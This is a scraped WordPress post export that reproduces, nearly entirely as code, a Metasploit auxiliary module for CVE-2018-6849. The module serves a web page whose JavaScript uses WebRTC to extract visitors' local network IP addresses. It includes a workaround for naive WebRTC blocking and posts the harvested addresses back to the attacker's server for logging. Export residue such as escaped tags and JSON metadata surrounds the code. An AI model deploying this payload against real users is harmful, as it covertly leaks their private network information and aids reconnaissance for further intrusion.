##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer<\/p>\n
def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘HTTP Client LAN IP Address Gather’,
‘Description’ => %q(
This module retrieves a browser’s network interface IP addresses
using WebRTC.
),
‘License’ => MSF_LICENSE,
‘Author’ => [
‘Daniel Roesler’, # JS Code
‘Dhiraj Mishra’ # MSF Module
],
‘References’ => [
[ ‘CVE’, ‘2018-6849’ ],
[ ‘URL’, ‘http:\/\/net.ipcalf.com\/’ ],
[ ‘URL’, ‘https:\/\/www.inputzero.io\/p\/private-ip-leakage-using-webrtc.html’ ]],
‘DisclosureDate’ => ‘2013-09-05’,
‘Actions’ => [[ ‘WebServer’, ‘Description’ => ‘Serve exploit via web server’ ]],
‘PassiveActions’ => [ ‘WebServer’ ],
‘DefaultAction’ => ‘WebServer’
)
)
end<\/p>\n
def run
exploit # start http server
end<\/p>\n
def setup
# code from: https:\/\/github.com\/diafygi\/webrtc-ips
@html = <<-JS
<script>
\/\/get the IP addresses associated with an account
function getIPs(callback){
var ip_dups = {};<\/p>\n
\/\/compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;<\/p>\n
\/\/bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){
\/\/NOTE: you need to have an iframe in the page right above the script tag
\/\/
\/\/<iframe id=”iframe” sandbox=”allow-same-origin” style=”display: none”><\/iframe>
\/\/<script>…getIPs called in here…
\/\/
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}<\/p>\n
\/\/minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]};<\/p>\n
var servers = {iceServers: [{urls: “stun:stun.services.mozilla.com”}]};<\/p>\n
\/\/construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);<\/p>\n
function handleCandidate(candidate){
\/\/match just the IP address
var ip_regex = \/([0-9]{1,3}(\\\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})\/
var ip_addr = ip_regex.exec(candidate)[1];<\/p>\n
\/\/remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);<\/p>\n
ip_dups[ip_addr] = true;
}<\/p>\n
\/\/listen for candidate events
pc.onicecandidate = function(ice){<\/p>\n
\/\/skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};<\/p>\n
\/\/create a bogus data channel
pc.createDataChannel(“”);<\/p>\n
\/\/create an offer sdp
pc.createOffer(function(result){<\/p>\n
\/\/trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});<\/p>\n
}, function(){});<\/p>\n
\/\/wait for a while to let everything done
setTimeout(function(){
\/\/read candidate info from local description
var lines = pc.localDescription.sdp.split(‘\\\\n’);<\/p>\n
lines.forEach(function(line){
if(line.indexOf(‘a=candidate:’) === 0)
handleCandidate(line);
});
}, 1000);
}<\/p>\n
getIPs(function(ip){
\/\/console.log(ip);
var xmlhttp = new XMLHttpRequest;
xmlhttp.open(‘POST’, window.location, true);
xmlhttp.send(ip);
});
<\/script>
JS
end<\/p>\n
def on_request_uri(cli, request)
case request.method.downcase
when ‘get’
print_status(“#{cli.peerhost}: Sending response (#{@html.size} bytes)”)
send_response(cli, @html)
when ‘post’
begin
ip = request.body
if ip =~ \/\\A([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})\\z\/
print_good(“#{cli.peerhost}: Found IP address: #{ip}”)
else
print_error(“#{cli.peerhost}: Received malformed IP address”)
end
rescue
print_error(“#{cli.peerhost}: Received malformed reply”)
end
else
print_error(“#{cli.peerhost}: Unhandled method: #{request.method}”)
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpServer def initialize(info = {})super(update_info(info,‘Name’ => ‘HTTP Client LAN IP Address Gather’,‘Description’ => %q(This module retrieves a browser’s network interface IP addressesusing WebRTC.),‘License’ => MSF_LICENSE,‘Author’ => [‘Daniel Roesler’, # JS Code‘Dhiraj Mishra’ # MSF Module],‘References’ => [[ ‘CVE’, ‘2018-6849’ ],[ ‘URL’, ‘http:\/\/net.ipcalf.com\/’ …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59288","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59288","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59288"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59288\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59288"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59288"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59288"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}